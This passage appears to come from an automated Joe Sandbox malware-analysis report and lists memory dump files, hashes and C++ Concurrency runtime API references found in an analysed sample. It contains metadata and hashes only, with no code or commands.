                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2033596534-0
                                                                                                                                                                                                                                              • Opcode ID: bf599e51d194aa2f4da10128d50c1e896ca2042cf20cd7a87c780b8d9013c437
                                                                                                                                                                                                                                              • Instruction ID: becd1a5ff886f1a006e00dc005ab40c26af161d0d5f457695410a133788e2281
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf599e51d194aa2f4da10128d50c1e896ca2042cf20cd7a87c780b8d9013c437
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B121627990061C9FDB05EF64D982ABDB7F4EF05310B2040FAF611AB252DB716D4ACB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00BFA069
                                                                                                                                                                                                                                                • Part of subcall function 00BFB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00BFB5AF
                                                                                                                                                                                                                                              • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00BFA07F
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00BFA0CB
                                                                                                                                                                                                                                                • Part of subcall function 00BFAB41: List.LIBCONCRT ref: 00BFAB77
                                                                                                                                                                                                                                              • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00BFA0DB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 932774601-0
                                                                                                                                                                                                                                              • Opcode ID: 01ca89514cc6ad48b013a275a7d57188b2fd9a8fabd91f096f0789772ace8b97
                                                                                                                                                                                                                                              • Instruction ID: 79381663a9f7c7b2faf3cbe0ba9f77b4aa5dc1d5bdad77b10c2d25edcbabffd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ca89514cc6ad48b013a275a7d57188b2fd9a8fabd91f096f0789772ace8b97
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7218C715006189FCB28EF65D9908BBF3F5FF48700700499EE646A7661DB34B909DBA2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BF4893
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BF48A5
                                                                                                                                                                                                                                                • Part of subcall function 00BF5555: _InternalDeleteHelper.LIBCONCRT ref: 00BF5564
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BF48AF
                                                                                                                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 00BF48C8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                                                                                                                              • Opcode ID: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                                                                                                                              • Instruction ID: 856f40ec70a7cb548efff46c23aef90a171cdcb766e17dccaf31b85484c87304
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf9d70bf35e3d479848032f4de7b83bab5195893ecadf1464f5d72adca9041f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3401D631600565AFCA25BB65D8C6E7EB7EABF4475070001A9F7045B612DB60EC2987A0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFEE6A
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFEE7C
                                                                                                                                                                                                                                                • Part of subcall function 00BFEF29: _InternalDeleteHelper.LIBCONCRT ref: 00BFEF3B
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFEE86
                                                                                                                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 00BFEE9F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
